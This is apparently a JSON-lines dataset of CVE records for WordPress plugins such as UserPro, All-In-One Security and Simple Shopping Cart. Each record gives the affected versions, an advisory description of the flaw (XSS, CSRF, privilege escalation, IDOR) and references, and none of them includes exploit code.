{"CVE_ID":"CVE-2024-13557","slug":"ut-shortcodes","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The Shortcodes by United Themes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.1.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/unitedthemes.com\\\/\",\"name\":\"https:\\\/\\\/unitedthemes.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4ca7dad-bfe2-443e-b575-362d8ff93242?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4ca7dad-bfe2-443e-b575-362d8ff93242?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2439","slug":"userpro","versionImpact":"5.1.5","versionEndExcluding":"5.1.6","description":"The UserPro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userpro' shortcode in versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6009","slug":"userpro","versionImpact":"5.1.4","versionEndExcluding":"5.1.5","description":"The UserPro plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.4 due to insufficient restriction on the 'userpro_update_user_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.","recommendation":"Update to version 5.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8bed9c0-dae3-405e-a946-5f28a3c30851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8bed9c0-dae3-405e-a946-5f28a3c30851?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0157","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.5","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8248b550-6485-4108-a701-8446ffa35f06\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8248b550-6485-4108-a701-8446ffa35f06\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0156","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.5","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caf1dbb5-197e-41e9-8f48-ba1f2360a759\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caf1dbb5-197e-41e9-8f48-ba1f2360a759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3890","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_cart_button' shortcode in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-wp-shopping-cart-installation-usage-290#step-1-inserting-an-add-to-cart-button\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-wp-shopping-cart-installation-usage-290#step-1-inserting-an-add-to-cart-button\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93898bf8-cfed-44bf-9d68-a0167beba86a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93898bf8-cfed-44bf-9d68-a0167beba86a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3889","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.3 via the 'process_payment_data' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to change the quantity of a product to a negative number, which subtracts the product cost from the total order cost. The attack will only work with Manual Checkout mode, as PayPal and Stripe will not process payments for a negative quantity.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-shopping-cart-enabling-manual-offline-checkout\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-shopping-cart-enabling-manual-offline-checkout\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41212533-535e-4a9e-a9b8-1240021a3752?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41212533-535e-4a9e-a9b8-1240021a3752?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3874","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.3 due to lack of randomization of a user controlled key. This makes it possible for unauthenticated attackers to access customer shopping carts and edit product links, add or delete products, and discover coupon codes.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/developer.wordpress.org\\\/reference\\\/functions\\\/wp_generate_password\\\/\",\"name\":\"https:\\\/\\\/developer.wordpress.org\\\/reference\\\/functions\\\/wp_generate_password\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fed59bf-885b-4a06-aff2-8e5ab5f83ba7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fed59bf-885b-4a06-aff2-8e5ab5f83ba7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6557","slug":"wp-scheduled-posts","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The SchedulePress \u2013 Auto Post & Publish, Auto Social Share, Schedule Posts with Editorial Calendar & Missed Schedule Post Publisher plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.1.3. This is due the plugin utilizing the wpdeveloper library and leaving the demo files in place with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80fa8b3-f345-4b3f-8a16-ee9f19b07a0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80fa8b3-f345-4b3f-8a16-ee9f19b07a0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scheduled-posts\\\/trunk\\\/vendor\\\/wpdevelopers\\\/pinterest-api-php\\\/demo\\\/boot.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scheduled-posts\\\/trunk\\\/vendor\\\/wpdevelopers\\\/pinterest-api-php\\\/demo\\\/boot.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117736%40wp-scheduled-posts&new=3117736%40wp-scheduled-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117736%40wp-scheduled-posts&new=3117736%40wp-scheduled-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1073","slug":"wp-slimstat","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cba63c-4629-48fd-850f-f68dad626a67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cba63c-4629-48fd-850f-f68dad626a67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/trunk\\\/admin\\\/index.php#L1004\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/trunk\\\/admin\\\/index.php#L1004\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4386","slug":"meow-gallery","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The Gallery Block (Meow Gallery) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data_atts\u2019 parameter in versions up to, and including, 5.1.3  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477b41a5-b2ff-4b94-9622-824146a0e2ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477b41a5-b2ff-4b94-9622-824146a0e2ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meow-gallery\\\/trunk\\\/classes\\\/core.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meow-gallery\\\/trunk\\\/classes\\\/core.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082976\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082976\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13505","slug":"survey-maker","versionImpact":"5.1.3.3","versionEndExcluding":"5.1.3.4","description":"The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ays_sections[5][questions][8][title]\u2019 parameter in all versions up to, and including, 5.1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/survey-maker\\\/tags\\\/5.1.3.2\\\/admin\\\/partials\\\/surveys\\\/actions\\\/partials\\\/survey-maker-surveys-actions-tab1.php#L1160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/survey-maker\\\/tags\\\/5.1.3.2\\\/admin\\\/partials\\\/surveys\\\/actions\\\/partials\\\/survey-maker-surveys-actions-tab1.php#L1160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3c22a2-b766-419c-a481-48e6a73b084c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3c22a2-b766-419c-a481-48e6a73b084c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4346","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.3","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.3 leaked settings of the plugin publicly, including the used email address.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc05f760-983d-4dc1-afbb-6b4965aa8abe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc05f760-983d-4dc1-afbb-6b4965aa8abe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3530","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.2","versionEndExcluding":"5.1.3","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to product price manipulation in all versions up to, and including, 5.1.2. This is due to a logic flaw involving the inconsistent use of parameters during the cart addition process. The plugin uses the parameter 'product_tmp_two' for computing a security hash against price tampering while using 'wspsc_product' to display the product, allowing an unauthenticated attacker to substitute details from a cheaper product and bypass payment for a more expensive item.","recommendation":"Update to version 5.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/wordpress-simple-paypal-shopping-cart-plugin-768\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/wordpress-simple-paypal-shopping-cart-plugin-768\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a3910b-adc4-4633-a6a1-32ba50894be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a3910b-adc4-4633-a6a1-32ba50894be4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9528","slug":"fluentform","versionImpact":"5.1.19","versionEndExcluding":"5.1.20","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form label fields in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to edit forms (administrator by default), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed4dfee-5f14-47ce-abed-cd226c110665?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed4dfee-5f14-47ce-abed-cd226c110665?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/app\\\/Services\\\/FormBuilder\\\/Components\\\/BaseComponent.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/app\\\/Services\\\/FormBuilder\\\/Components\\\/BaseComponent.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/boot\\\/globals.php#L342\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/boot\\\/globals.php#L342\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6703","slug":"fluentform","versionImpact":"5.1.19","versionEndExcluding":"5.1.20","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018description\u2019 and 'btn_txt' parameters in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for attackers with the Form Manager permissions and Subscriber+ user role, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69dc9236-8079-434f-b2b5-060a0c5eba46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69dc9236-8079-434f-b2b5-060a0c5eba46?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FluentConversational\\\/Classes\\\/Elements\\\/WelcomeScreen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FluentConversational\\\/Classes\\\/Elements\\\/WelcomeScreen.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2447","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing or incorrect nonce validation on the 'export_users' function. This makes it possible for unauthenticated attackers to export the users to a csv file, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0372efe4-b5be-4601-be43-5c12332ea1a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0372efe4-b5be-4601-be43-5c12332ea1a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2446","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to sensitive information disclosure via the 'userpro' shortcode in versions up to, and including 5.1.1. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to retrieve sensitive user meta that can be used to gain access to a high privileged user account.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4072ba5f-6385-4fa3-85b6-89dac7b60a92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4072ba5f-6385-4fa3-85b6-89dac7b60a92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6008","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6e2b9e-3d70-4c07-a779-45164816b89c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6e2b9e-3d70-4c07-a779-45164816b89c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
